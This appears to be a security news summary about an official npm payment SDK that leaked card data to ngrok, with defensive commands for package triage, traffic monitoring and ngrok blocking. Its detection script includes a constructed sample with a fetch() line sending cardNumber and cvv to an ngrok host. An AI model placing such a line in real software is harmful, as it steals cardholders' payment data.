Payment Processor Publishes Official NPM Package That Leaks Credit Card Data via Ngrok

A recently discovered NPM package, published under the official account of a global payment processing company, was found to leak sensitive credit card details to a Ngrok endpoint. This malicious SDK was designed for mobile app integrations, posing a severe threat to applications using it. The package has since been removed after disclosure to NPM and the affected company.

Read the full article here:

https://www.getsafety.com/blog-posts/payment-processor-publishes-official-npm-package-that-leaks-credit-card-data-via-ngrok

You Should Know:

1. Detecting Malicious NPM Packages

Use the following commands to inspect NPM packages before installation:

# Check package metadata (publisher, versions, repository)
npm view <package-name>

# Show where the package sits in the installed dependency tree
npm ls <package-name>

# Audit installed packages against known vulnerabilities
npm audit
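The commands above only show metadata and known CVEs; the package in this story was malicious by design, not vulnerable, so it also helps to read what it would actually do. The following added example (not code from the original post or from the vendor's SDK) triages a package's parsed `package.json` and source files for the red flags this incident illustrates: install-time lifecycle hooks, hard-coded ngrok hostnames, and card-data field names sitting next to outbound network calls. The sample package is constructed inline and is not the real one.

```javascript
// Static triage of an npm package for the warning signs described in this post.
// Inputs: the parsed package.json object and a map of file path -> source text.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const TUNNEL_RE = /\b[\w.-]*ngrok[\w.-]*/gi;                  // any ngrok hostname
const CARD_FIELD_RE = /\b(cardNumber|pan|cvv|cvc|expiry|cardholder)\b/i;
const NETWORK_RE = /\b(fetch|axios|XMLHttpRequest|https?\.request)\b/;

function triagePackage(pkg, files) {
  const findings = [];
  // 1. Lifecycle hooks run arbitrary code on every `npm install`.
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (cmd) findings.push({ kind: "lifecycle-hook", where: `package.json#scripts.${hook}`, detail: cmd });
  }
  for (const [path, src] of Object.entries(files)) {
    // 2. A payment SDK has no legitimate reason to contact a tunnelling service.
    src.split("\n").forEach((line, i) => {
      for (const host of line.match(TUNNEL_RE) || []) {
        findings.push({ kind: "tunnel-endpoint", where: `${path}:${i + 1}`, detail: host });
      }
    });
    // 3. Card-data field names in the same file as an outbound network call.
    if (CARD_FIELD_RE.test(src) && NETWORK_RE.test(src)) {
      findings.push({ kind: "card-data-near-network", where: path, detail: src.match(CARD_FIELD_RE)[0] });
    }
  }
  return findings;
}

// Constructed sample mimicking the described pattern (hostnames and names are made up).
const SAMPLE_PKG = { name: "example-pay-sdk", version: "1.0.0", scripts: { postinstall: "node scripts/setup.js" } };
const SAMPLE_FILES = {
  "lib/sdk.js": [
    "async function tokenize(card) {",
    "  // legitimate call to the processor API",
    "  const res = await fetch('https://api.example-pay.invalid/tokenize', { method: 'POST', body: JSON.stringify(card) });",
    "  // the same payload copied to a tunnel endpoint",
    "  fetch('https://abc123.ngrok.io/collect', { method: 'POST', body: JSON.stringify({ cardNumber: card.cardNumber, cvv: card.cvv }) });",
    "  return res.json();",
    "}",
  ].join("\n"),
  "lib/util.js": "module.exports = { formatAmount: (cents) => (cents / 100).toFixed(2) };",
};

function triageSample() {
  return triagePackage(SAMPLE_PKG, SAMPLE_FILES);
}

for (const f of triageSample()) console.log(`[${f.kind}] ${f.where}: ${f.detail}`);
```

Run it against an unpacked tarball (`npm pack <package-name>` then extract) by reading `package.json` and each `.js` file into the two inputs; a hit on any of the three checks is a reason to read that code before installing.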

2. Monitoring Suspicious Network Activity

If you suspect data exfiltration via Ngrok or other tunneling tools, use these Linux commands:

# Check active network connections with their owning process (-l alone would show only listening sockets)
sudo netstat -tunp

# Monitor outbound traffic to the usual web ports (tunnels such as Ngrok ride over TLS on 443)
sudo tcpdump -i any 'dst port 80 or 443' -w traffic.pcap

# Inspect DNS queries for lookups of tunnelling domains
sudo tshark -i any -f "port 53" -Y "dns"

3. Securing Mobile SDKs

For developers integrating third-party SDKs:

  • Always verify checksums:
    shasum -a 256 <file-path> 
    
  • Use Burp Suite or Wireshark to analyze SDK network traffic.

4. Blocking Ngrok Endpoints

Add Ngrok domains to your firewall blocklist:

# Using iptables (the hostname is resolved to its current IP addresses once, when the rule is added; a leading-dot wildcard is not accepted)
sudo iptables -A OUTPUT -d ngrok.io -j DROP

# Or via the hosts file (no wildcard support: each subdomain needs its own entry, so a DNS sinkhole or proxy blocklist scales better)
echo "0.0.0.0 ngrok.io" | sudo tee -a /etc/hosts

5. Windows Defender for Malware Detection

Scan for malicious DLLs or executables:

# Run a full system scan
Start-MpScan -ScanType FullScan

# Check loaded modules in a process
Get-Process -Name <process> | Select -ExpandProperty Modules

What Undercode Says

Supply chain attacks are escalating, and developers must adopt rigorous security practices:
– Always verify package sources (use `npm ci` for deterministic installs).
– Monitor network traffic for unusual outbound connections.
– Use static analysis tools like `SonarQube` or `Snyk` for dependency checks.
– Implement runtime protection (e.g., `Falco` for Linux anomaly detection).

For incident responders:

# Capture process memory of a suspicious app (gcore writes a core file named dump.<PID>)
sudo gcore -o dump <PID>

# Analyze with Volatility: it needs a full physical-memory image (for example one acquired with LiME) and a matching kernel profile,
# not a gcore process dump; the Linux process listing plugin is linux_pslist
vol.py -f <memory-image> --profile=<LinuxProfile> linux_pslist

Expected Output:

A secure development workflow with automated checks for:

  • Unauthorized dependencies (npm audit --production).
  • Data exfiltration (suricata -c /etc/suricata/suricata.yaml).
  • Runtime integrity (aide --check for file changes).

Stay vigilant—attackers are targeting open-source ecosystems more than ever.

References:

Reported By: Mccartypaul Softwaresupplychain – Hackers Feeds